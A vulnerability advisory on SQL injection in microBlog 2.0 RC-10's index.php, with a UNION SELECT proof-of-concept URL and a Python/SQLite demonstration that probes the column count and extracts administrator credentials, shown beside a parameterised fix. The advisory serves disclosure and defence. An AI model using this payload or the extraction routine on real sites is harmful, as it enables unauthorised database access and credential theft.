SQL Injection Vulnerability in microBlog

Summary

Vulnerability: SQL Injection Vulnerability in microBlog
Discovered: 2006.01.16
Last Update: 2006.02.22 (solution added)
ID: EV0035
CVE: CVE-2006-0234
Risk Level: medium
Type: SQL Injection
Status: Patched
Vendor: n/a
Vulnerable Software: microBlog (http://www.stamcar.com/projekti/microblog/)
Version: 2.0 RC-10
PoC/Exploit: Available
Solution: Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

An SQL injection vulnerability was found in the microBlog (http://www.stamcar.com/projekti/microblog/) script.

Vulnerable script: index.php

The $month and $year variables are not properly sanitized before being used in an SQL query. By injecting arbitrary SQL code through them, an attacker can run SQL queries of their own choosing against the application's database.

The administrator's login and password can be disclosed this way.

PoC/Exploit

SQL Injection Example (the UNION SELECT lists 14 columns so that it matches the column count of the original query; the trailing /* is intended to comment out the remainder of the statement):

http://host/microblog/index.php?month=1&year=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*
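The mechanics of the PoC, as an added example that is not microBlog's code: a constructed SQLite schema (table and column names are assumptions, the real script is PHP against MySQL) stands in for the vulnerable query, the column count is probed the way an attacker does before writing the UNION, the administrator's credentials are pulled out through the $year parameter, and the same request is shown against a parameterised, type-checked query.

```python
"""UNION-based SQL injection through an unsanitized year parameter, beside
the parameterised fix. Constructed example, not code from microBlog."""
import sqlite3

# Constructed sample schema; the real microBlog tables are not on the page.
SCHEMA = """
CREATE TABLE posts(id INTEGER, title TEXT, body TEXT, month INTEGER, year INTEGER);
INSERT INTO posts VALUES (1, 'hello', 'first post', 1, 2006);
CREATE TABLE users(id INTEGER, login TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
"""


def make_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_posts(db, month, year):
    """Mirrors the flaw: request values are pasted straight into the SQL text.
    The trailing ORDER BY is what the PoC's '/*' exists to comment out."""
    sql = ("SELECT id, title, body, month, year FROM posts "
           f"WHERE month={month} AND year={year} ORDER BY id DESC")
    return db.execute(sql).fetchall()


def hardened_posts(db, month, year):
    """Fix: coerce to the expected type, range-check, and bind as parameters
    so the input is never interpreted as SQL."""
    try:
        m, y = int(month), int(year)
    except (TypeError, ValueError):
        raise ValueError("month and year must be integers")
    if not 1 <= m <= 12:
        raise ValueError("month out of range")
    sql = ("SELECT id, title, body, month, year FROM posts "
           "WHERE month=? AND year=? ORDER BY id DESC")
    return db.execute(sql, (m, y)).fetchall()


def find_column_count(db, max_cols=20):
    """Probe how many columns the original SELECT returns: a UNION with the
    wrong count is a database error, the right count is the first one that
    succeeds (the advisory's PoC settled on 14 for microBlog)."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_posts(db, "1", f"9999 union select {cols}/*")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def exploit(db):
    """Use the discovered column count to pull (login, password) pairs out of
    the users table through the year parameter; year=9999 matches no post,
    so only the UNIONed rows come back."""
    payload = "9999 union select id, login, password, 0, 0 from users/*"
    rows = vulnerable_posts(db, "1", payload)
    return [(title, body) for _, title, body, _, _ in rows]


def hardened_rejects(db, month, year):
    """True if the hardened query refuses the request outright."""
    try:
        hardened_posts(db, month, year)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("columns in original query:", find_column_count(db))
    print("leaked credentials:", exploit(db))
    payload = "9999 union select id, login, password, 0, 0 from users/*"
    print("hardened query rejects payload:", hardened_rejects(db, "1", payload))
```

The type check alone would stop this particular payload, but the parameter binding is the real fix: even a string that passes validation is bound as a literal value and compared against the year column rather than parsed as SQL.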

Solution

Install or upgrade to version 2.1 to fix this vulnerability.